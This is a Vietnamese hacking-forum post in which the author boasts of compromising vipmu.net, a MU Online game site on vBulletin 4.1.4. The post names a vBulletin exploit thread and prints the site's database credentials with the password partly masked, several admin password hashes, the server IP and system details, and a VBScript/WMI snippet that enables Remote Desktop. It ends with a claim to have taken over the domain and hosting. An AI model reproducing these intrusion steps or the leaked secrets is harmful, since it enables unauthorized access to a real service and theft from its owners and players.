thấy rao là mu chơi hay ,ai spam nhanh được tiền trả công gì đó , thử zô xem thế nào....
vào http://vipmu.net/ lượn được 1 vòng thì thấy cái diễn đàn Powered by vBulletin® Version 4.1.4
thử Exploit cái bug http://forum.vnhack.us/showthread.php?t=125 nhưng chỉ lấy được cái tên data của nó
Định get tiếp nhưng chả được , vì ko có quyền và nó change table thành
eplay_user
Tuy lấy được pass MD5 + salt nhưng vẫn ko login được
đến đây chả nhẽ đành bó tay chịu trói ..........................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
Cuối cùng thì anh cũng nghĩ ra và chiếm được server
đầu tiên thì anh lấy được
$core['db_host'] = "127.0.0.1";
$core['db_name'] = "MuOnline";
$core['db_user']= "sa";
$core['db_password'] = "tranvxxx";
Ngồi thêm một lúc nữa mình chiếm luôn được cả server......
Nhưng anh ko remote desktop được , ngồi nghĩ 1 lúc anh có đoạn java để bật chức năng cho phép remote desktopđây là thông tin server :
Safe_mod: OFF - PHP version: 5.2.9 - cURL: ON - MySQL: ON - MSSQL: ON - PostgreSQL: ON - Oracle: OFF
Disable functions : NONE
Uname -a: Windows NT NGHIAVD1980 5.1 build 2600
Server: - id: 0(SYSTEM) - uid=0 (SYSTEM) gid=0(SYSTEM
Nhưng vẫn không khả dụng , chán quá anh lòng vòng 1 lúc xem có gì hay ho ko hehe và ko mất công mong đợi anh được cái đống lộn xộn nàymachine = "."cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"query = "select * from Win32_TerminalServiceSetting"value_to_set = 1 ' 0=off, 1=on
set cimv2 = GetObject( cimv2_string )set items = cimv2.ExecQuery( query )
for each item in items
item.SetAllowTSConnections( value_to_set )
next
$database = 'MuOnline';
$passviewcard = '30a6f236e8681dcf970e4d0314780b49';
$passcode = '30a6f236e8681dcf970e4d0314780b49';
$passadmin = '30a6f236e8681dcf970e4d0314780b49';
$passcard = '30a6f236e8681dcf970e4d0314780b49';
và anh nhận thấy nó remote vào host để chạy web 210.245.90.205 anh ping lại vipmu.net thì được cái này
bây giờ làm gì đây , giờ muốn vào hosting để xem cái nạp thẻ mà mò mãi ko ra anh lại tiếp tục
..........................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
và ông trời ổng đền đáp công ơn của anh bấy cho 1 phút im lặng và suy nghĩ đau hết cả đầu
trước tiên lấy được thông tin domain name hỳ hỳ
Ổng trởi ổng đúng là giúp kẻ trộm,Nhưng có domain rồi muốn có cả hosting nữa cơ chứ hổng có thích domain , và lại tiếp tục
.........................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
.................think.................think.................think.................think.................think.................think.................think
lại 1 phút nát óc suy nghĩ cuổi củng ổng trời cũng phù hộ cho mình lấy được cái nì nì
Bây giờ đã chiếm sạch từ A cho đến gần Z rồi chỉ còn cái email nữa là tèo téo teooooooooo
Checked By TMT- VNHGROUP